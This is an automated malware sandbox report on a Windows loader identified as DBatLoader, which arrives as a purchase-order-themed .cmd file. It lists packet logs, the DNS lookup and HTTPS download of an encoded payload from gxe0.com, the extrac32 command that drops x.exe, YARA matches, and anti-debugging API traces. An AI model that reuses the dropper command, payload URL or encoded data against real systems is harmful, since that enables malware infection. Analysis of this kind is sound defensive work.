Dec 31, 2024 09:44:15.578321934 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.578845978 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.578864098 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.578907967 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.578916073 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.578938007 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.579448938 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.579469919 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.579684973 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.579694033 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.579807997 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.579822063 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.579853058 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.579859972 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.579879045 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.580316067 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.580339909 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.580379963 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.580387115 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.580404997 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.580760956 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.580775976 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.580837011 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.580842972 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.624710083 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.624743938 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.624836922 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.624855042 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.664845943 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.664885998 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.664947987 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.664963007 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.665160894 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.665183067 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.665225983 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.665234089 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.665247917 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.665793896 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.665807962 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.665847063 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.665854931 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.665878057 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.666301966 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.666326046 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.666367054 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.666373968 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.666431904 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.666465044 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.666479111 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.666482925 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.666498899 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.666516066 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.666542053 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.727982998 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.727982998 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.728008032 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.728018999 CET	443	49707	198.252.105.91	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 09:44:11.704595089 CET	55003	53	192.168.2.8	1.1.1.1
Dec 31, 2024 09:44:12.707782030 CET	55003	53	192.168.2.8	1.1.1.1
Dec 31, 2024 09:44:12.996787071 CET	53	55003	1.1.1.1	192.168.2.8
Dec 31, 2024 09:44:12.996798992 CET	53	55003	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 09:44:11.704595089 CET	192.168.2.8	1.1.1.1	0xec15	Standard query (0)	gxe0.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:44:12.707782030 CET	192.168.2.8	1.1.1.1	0xec15	Standard query (0)	gxe0.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 09:44:12.996787071 CET	1.1.1.1	192.168.2.8	0xec15	No error (0)	gxe0.com		198.252.105.91	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:44:12.996798992 CET	1.1.1.1	192.168.2.8	0xec15	No error (0)	gxe0.com		198.252.105.91	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gxe0.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	198.252.105.91	443	7588	C:\Users\user\AppData\Local\Temp\x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:44:13 UTC	162	OUT	GET /yak2/228_Dlwloedmcwb HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: gxe0.com
2024-12-31 08:44:14 UTC	365	IN	HTTP/1.1 200 OK Connection: close last-modified: Fri, 13 Dec 2024 10:33:51 GMT accept-ranges: bytes content-length: 2253516 date: Tue, 31 Dec 2024 08:44:13 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-12-31 08:44:14 UTC	1003	IN	Data Raw: 6f 61 6d 67 56 42 36 69 72 45 59 64 47 41 6f 63 47 52 41 4f 43 68 38 55 49 68 6f 50 47 42 6b 4d 46 42 55 65 46 52 4d 66 49 51 77 62 49 67 38 52 46 43 41 4d 49 52 51 52 46 52 67 61 45 52 45 56 43 52 59 58 49 42 34 64 49 67 77 64 46 68 77 56 45 77 38 4a 48 68 34 66 45 67 34 61 45 79 41 51 47 52 4d 68 44 52 51 66 44 78 55 64 48 68 67 64 43 52 34 56 43 77 34 56 48 78 63 55 47 52 41 63 45 68 41 57 45 71 47 70 6f 46 51 65 6f 71 78 47 53 68 51 66 46 42 63 4e 44 42 55 4c 48 77 71 68 71 61 42 55 48 71 4b 73 52 74 58 53 77 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 Data Ascii: oamgVB6irEYdGAocGRAOCh8UIhoPGBkMFBUeFRMfIQwbIg8RFCAMIRQRFRgaEREVCRYXIB4dIgwdFhwVEw8JHh4fEg4aEyAQGRMhDRQfDxUdHhgdCR4VCw4VHxcUGRAcEhAWEqGpoFQeoqxGShQfFBcNDBULHwqhqaBUHqKsRtXSwNbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrr
2024-12-31 08:44:14 UTC	14994	IN	Data Raw: 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36 78 4d 44 54 76 73 6a 51 77 39 4c 52 78 72 36 39 31 4c 32 33 30 38 6e 47 7a 38 6a 44 75 62 37 4b 78 73 6d 2b 75 62 33 53 30 4c 6d 35 76 63 47 38 75 38 72 55 31 63 6a 47 31 62 7a 57 76 62 66 44 77 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56 79 4d 62 56 76 4e 61 39 74 38 50 42 31 4e 54 54 75 4d 54 51 74 38 71 36 30 62 66 4a 78 62 37 54 77 37 33 56 31 4e 4c 56 77 59 63 36 57 67 Data Ascii: U0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6xMDTvsjQw9LRxr691L2308nGz8jDub7Kxsm+ub3S0Lm5vcG8u8rU1cjG1bzWvbfDwdTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTVyMbVvNa9t8PB1NTTuMTQt8q60bfJxb7Tw73V1NLVwYc6Wg
2024-12-31 08:44:14 UTC	16384	IN	Data Raw: 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36 78 4d 44 54 76 73 6a 51 77 39 4c 52 78 72 36 39 31 4c 32 33 30 38 6e 47 7a 38 6a 44 75 62 37 4b 78 73 6d 2b 75 62 33 53 30 4c 6d 35 76 63 47 38 75 38 72 55 31 63 6a 47 31 62 7a 57 76 62 66 44 77 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b Data Ascii: NbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6xMDTvsjQw9LRxr691L2308nGz8jDub7Kxsm+ub3S0Lm5vcG8u8rU1cjG1bzWvbfDwdTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+
2024-12-31 08:44:14 UTC	16384	IN	Data Raw: 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56 79 4d 62 56 76 4e 61 39 74 38 50 42 31 4e 54 54 75 4d 54 51 74 38 71 36 30 62 66 4a 78 62 37 54 77 37 33 56 31 4e 4c 56 77 64 53 39 76 38 53 39 30 37 75 2b 30 62 72 57 75 4c 71 38 75 4e 58 53 77 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 Data Ascii: dTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTVyMbVvNa9t8PB1NTTuMTQt8q60bfJxb7Tw73V1NLVwdS9v8S907u+0brWuLq8uNXSwNbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3
2024-12-31 08:44:14 UTC	16384	IN	Data Raw: 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36 78 4d 44 54 76 73 6a 51 77 39 4c 52 78 72 36 39 31 4c 32 33 30 38 6e 47 7a 38 6a 44 75 62 37 4b 78 73 6d 2b 75 62 33 53 30 4c 6d 35 76 63 47 38 75 38 72 55 31 63 6a 47 31 62 7a 57 76 62 66 44 77 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 Data Ascii: ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6xMDTvsjQw9LRxr691L2308nGz8jDub7Kxsm+ub3S0Lm5vcG8u8rU1cjG1bzWvbfDwdTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfT
2024-12-31 08:44:14 UTC	16384	IN	Data Raw: 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56 79 4d 62 56 76 4e 61 39 74 38 50 42 31 4e 54 54 75 4d 54 51 74 38 71 36 30 62 66 4a 78 62 37 54 77 37 33 56 31 4e 4c 56 77 64 53 39 76 38 53 39 30 37 75 2b 30 62 72 57 75 4c 71 38 75 4e 58 53 77 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 Data Ascii: cW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTVyMbVvNa9t8PB1NTTuMTQt8q60bfJxb7Tw73V1NLVwdS9v8S907u+0brWuLq8uNXSwNbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU
2024-12-31 08:44:14 UTC	16384	IN	Data Raw: 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36 78 4d 44 54 76 73 6a 51 77 39 4c 52 78 72 36 39 31 4c 32 33 30 38 6e 47 7a 38 6a 44 75 62 37 4b 78 73 6d 2b 75 62 33 53 30 4c 6d 35 76 63 47 38 75 38 72 55 31 63 6a 47 31 62 7a 57 76 62 66 44 77 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 Data Ascii: 7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6xMDTvsjQw9LRxr691L2308nGz8jDub7Kxsm+ub3S0Lm5vcG8u8rU1cjG1bzWvbfDwdTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65
2024-12-31 08:44:14 UTC	16384	IN	Data Raw: 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56 79 4d 62 56 76 4e 61 39 74 38 50 42 31 4e 54 54 75 4d 54 51 74 38 71 36 30 62 66 4a 78 62 37 54 77 37 33 56 31 4e 4c 56 77 64 53 39 76 38 53 39 30 37 75 2b 30 62 72 57 75 4c 71 38 75 4e 58 53 77 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 Data Ascii: b/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTVyMbVvNa9t8PB1NTTuMTQt8q60bfJxb7Tw73V1NLVwdS9v8S907u+0brWuLq8uNXSwNbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77R
2024-12-31 08:44:14 UTC	16384	IN	Data Raw: 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36 78 4d 44 54 76 73 6a 51 77 39 4c 52 78 72 36 39 31 4c 32 33 30 38 6e 47 7a 38 6a 44 75 62 37 4b 78 73 6d 2b 75 62 33 53 30 4c 6d 35 76 63 47 38 75 38 72 55 31 63 6a 47 31 62 7a 57 76 62 66 44 77 64 54 55 30 37 6a 45 30 4c 66 4b 75 74 47 33 79 63 57 2b 30 38 4f 39 31 64 54 53 31 63 48 55 76 62 2f 45 76 64 4f 37 76 74 47 36 31 72 69 36 76 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56 Data Ascii: b3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6xMDTvsjQw9LRxr691L2308nGz8jDub7Kxsm+ub3S0Lm5vcG8u8rU1cjG1bzWvbfDwdTU07jE0LfKutG3ycW+08O91dTS1cHUvb/EvdO7vtG61ri6vLjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTV
2024-12-31 08:44:14 UTC	16384	IN	Data Raw: 4c 6a 56 30 73 44 57 30 62 72 45 77 4e 4f 2b 79 4e 44 44 30 74 48 47 76 72 33 55 76 62 66 54 79 63 62 50 79 4d 4f 35 76 73 72 47 79 62 36 35 76 64 4c 51 75 62 6d 39 77 62 79 37 79 74 54 56 79 4d 62 56 76 4e 61 39 74 38 50 42 31 4e 54 54 75 4d 54 51 74 38 71 36 30 62 66 4a 78 62 37 54 77 37 33 56 31 4e 4c 56 77 64 53 39 76 38 53 39 30 37 75 2b 30 62 72 57 75 4c 71 38 75 4e 58 53 77 4e 62 52 75 73 54 41 30 37 37 49 30 4d 50 53 30 63 61 2b 76 64 53 39 74 39 50 4a 78 73 2f 49 77 37 6d 2b 79 73 62 4a 76 72 6d 39 30 74 43 35 75 62 33 42 76 4c 76 4b 31 4e 58 49 78 74 57 38 31 72 32 33 77 38 48 55 31 4e 4f 34 78 4e 43 33 79 72 72 52 74 38 6e 46 76 74 50 44 76 64 58 55 30 74 58 42 31 4c 32 2f 78 4c 33 54 75 37 37 52 75 74 61 34 75 72 79 34 31 64 4c 41 31 74 47 36 Data Ascii: LjV0sDW0brEwNO+yNDD0tHGvr3UvbfTycbPyMO5vsrGyb65vdLQubm9wby7ytTVyMbVvNa9t8PB1NTTuMTQt8q60bfJxb7Tw73V1NLVwdS9v8S907u+0brWuLq8uNXSwNbRusTA077I0MPS0ca+vdS9t9PJxs/Iw7m+ysbJvrm90tC5ub3BvLvK1NXIxtW81r23w8HU1NO4xNC3yrrRt8nFvtPDvdXU0tXB1L2/xL3Tu77Ruta4ury41dLA1tG6

Target ID:	0
Start time:	03:44:08
Start date:	31/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "
Imagebase:	0x7ff7ed350000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:44:08
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:44:09
Start date:	31/12/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	extrac32 /y "C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x7ff6a9210000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:44:09
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x400000
File size:	953'856 bytes
MD5 hash:	6C1C692B2DE02C5CE02A5D2D27117851
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000003.1592457768.000000007F700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.1593974341.00000000022C7000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.1414129618.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.1413414951.000000007FD80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.1411291204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
Antivirus matches:	Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:44:16
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2168
Imagebase:	0xf60000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.2%
Total number of Nodes:	241
Total number of Limit Nodes:	10

Executed Functions

Function 02B9EC74 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InetIsOffline.URL(00000000,00000000,02BAAFA1,?,?,?,000002F7,00000000,00000000), ref: 02B9ECAE

Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
Part of subcall function 02B98824: FreeLibrary.KERNEL32(74BF0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74BF0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB

Part of subcall function 02B9EB94: GetModuleHandleW.KERNEL32(KernelBase,?,02B9EF98,UacInitialize,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize), ref: 02B9EB9A
Part of subcall function 02B9EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B9EBAC

Part of subcall function 02B9EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B9EC00
Part of subcall function 02B9EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B9EC12
Part of subcall function 02B9EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B9EC29

Part of subcall function 02B87E18: GetFileAttributesA.KERNEL32(00000000,?,02B9F8CC,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,UacInitialize), ref: 02B87E23

Part of subcall function 02B8C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CD58C8,?,02B9FBFE,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession), ref: 02B8C303

Part of subcall function 02B9DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DBEB
Part of subcall function 02B9DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DC1B
